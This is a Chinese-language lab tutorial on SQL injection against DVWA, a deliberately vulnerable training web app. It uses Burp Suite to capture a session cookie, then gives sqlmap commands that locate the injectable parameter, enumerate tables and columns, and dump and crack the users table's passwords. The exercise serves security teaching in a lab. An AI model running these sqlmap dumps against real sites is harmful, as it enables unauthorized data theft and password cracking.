DVWA中SQL注入实验
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
实验简介
DVWA (Dam Vulnerable Web Application)DVW A是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。支持很多数据库。所以一个矛一个盾,正好感受一下sql注入。DVW A 的安装就不详细介绍了,需要PHP/apache/mysql sqlmap是开源的,可以在github上找到。
cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数已cookie方式提交了,而一般的注入我们是使用get或者post方式提交,get方式提交就是直接在网址后面加上需要注入的语句,post则是通过表单方式,get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。
实验预备知识
1.web抓包工具的使用;
2.sqlmap的使用
3.了解cookie注入原理
实验操作
一、查找注入点
1.打开Burp Suite,设置浏览器代理上网
图1:Burp Suite设置
图2:浏览器设置
图3:Burp Suite获取web数据包界面。intercept off(关闭)、在点击改建intercept on(开启)
2.将Burp Suite设置成intercept off,登录DVW A,将DVW A安全性设置成low;然后将Burp Suite设置成intercept on,在DVW A的SQL Injection页面上有一个userid输入框,随便输入然后点击submit,在Burp Suite中可以找到GET信息,其中有Request URI和Cookie信息。
4. 使用sqlmap查找注入点
root@kali:~# sqlmap -u "http://192.168.10.34/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low;PHPSESSID=9kseq7rldgemj30rihogdt7bn3"
注:--cookie前有空格
得到可能的注入点是id,数据库是mysql
[INFO] resuming back-end DBMS 'mysql'
[INFO] testing connection to the target URL
[INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: PHP 5.3.3, , Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
二、开始脱库
1. root@kali:~# sqlmap -u "http://19
2.168.10.34/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low;PHPSESSID=9kseq7rldgemj30rihogdt7bn3" --current-db
得到当前数据库名
2. root@kali:~# sqlmap -u "http://192.168.10.34/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low;PHPSESSID=9kseq7rldgemj30rihogdt7bn3" --current-db --tables
–Ddvwa
得到dvwa库的表名
3. root@kali:~# sqlmap -u "http://192.168.10.34/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low;PHPSESSID=9kseq7rldgemj30rihogdt7bn3" -T guestbook –columns 注:-T后跟表名参数,可以为users表,获取users表结构
获取guestbook表结构
获取users表结构
4. root@kali:~# sqlmap -u "http://192.168.10.34/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low;PHPSESSID=9kseq7rldgemj30rihogdt7bn3" -T users –dump
注:在sqlmap询问时候破解密码时,选择是,sqlmap会使用自己的字典来破解密码,得到5个用户的密码。
由于显示列比较长,终端缩放最大显示效果较好。